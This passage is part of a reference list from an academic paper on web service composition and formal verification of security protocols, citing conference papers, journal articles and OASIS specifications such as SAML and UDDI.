[BCF07] Philippe Balbiani, Fahima Cheikh, and Guillaume Feuillade. Considérations relatives à la décidabilité et à la complexité du problème de la composition de services. In Proceedings of the Journées Francophones Modèles formels de l’Interaction (MFI 2007), pages 261–268, Paris, France, 2007. Annales du LAMSADE.


[BCF08a] Philippe Balbiani, Fahima Cheikh, and Guillaume Feuillade. Composition of interactive web services based on controller synthesis. 2nd International Workshop on Web Service Composition and Adaptation (WSCA 08), 0(0):521–528, 2008.

[BCF08b] Philippe Balbiani, Fahima Cheikh, and Guillaume Feuillade. Composition of web services: algorithms and complexity. 1st Interaction and Concurrency Experience (ICE 08), 0:96–107, 2008.

[BG01] David Basin and Harald Ganzinger. Automated complexity analysis based on ordered resolution. J. ACM, 48(1):70–109, 2001.

[BCDP08] Daniele Berardi, Fahima Cheikh, Giuseppe De Giacomo, and Fabio Patrizi. Automatic service composition via simulation. International Journal of Foundations of Computer Science, 19(2):429–451, 2008.

[BCCZ99] A. Biere, A. Cimatti, E. Clarke, and Y. Zhu. Symbolic Model Checking without BDDs. In Proceedings of TACAS’99, LNCS 1579, pages 193–207. Springer-Verlag, 1999.

[Bla01] B. Blanchet. An efficient cryptographic protocol verifier based on Prolog rules. In Proceedings of the 14th IEEE Computer Security Foundations Workshop (CSFW-14), pages 82–96. IEEE Computer Society, 2001.

[BHKO04] Y. Boichut, P.-C. Heam, O. Kouchnarenko, and F. Oehl. Improvements on the Genet and Klay Technique to Automatically Verify Security Protocols. In Proc. Int. Workshop on Automated Verification of Infinite-State Systems (AVIS’2004), joint to ETAPS’04, pages 1–11, Barcelona, Spain, 2004. The final version will be published in Electronic Notes in Theoretical Computer Science, Elsevier.

[CMR08] Yannick Chevalier, Mohammed Anis Mekki, and Michaël Rusinowitch. Automatic Composition of Services with Security Policies. In Jyothishman Pathak, Samik Basu, Marco Pistore, Prashant Doshi, and Rama Akkiraju, editors, Web Service Composition and Adaptation Workshop (held in conjunction with SCC/SERVICES-2008), pages 529–537, 2008. IEEE.

[CLC03] H. Comon-Lundh and V. Cortier. New decidability results for fragments of first-order logic and application to cryptographic protocols. Technical Report LSV-03-3, Laboratoire Specification and Verification, ENS de Cachan, Cachan, France, January 2003.

[Con] Oasis Consortium. Universal Description, Discovery, and Integration specification. http://uddi.org/pubs/uddi-v3.0.2-20041019.pdf.

[Cra05] Jason Crampton. Understanding and developing role-based administrative models. In CCS ’05: Proceedings of the 12th ACM conference on Computer and communications security, pages 158–167, New York, NY, USA, 2005. ACM.

[GMM05] Paolo Giorgini, Fabio Massacci, and John Mylopoulos. Modeling security requirements through ownership, permission and delegation. In Proc. of RE’05, pages 167–176. IEEE Press, 2005.

[OAS05a] OASIS. Conformance Requirements for the OASIS Security Assertion Markup Language (SAML) V2.0. Available at http://www.oasis-open.org, March 2005.

[OAS05b] OASIS. Profiles for the OASIS Security Assertion Markup Language (SAML) V2.0. Available at http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=security, March 2005.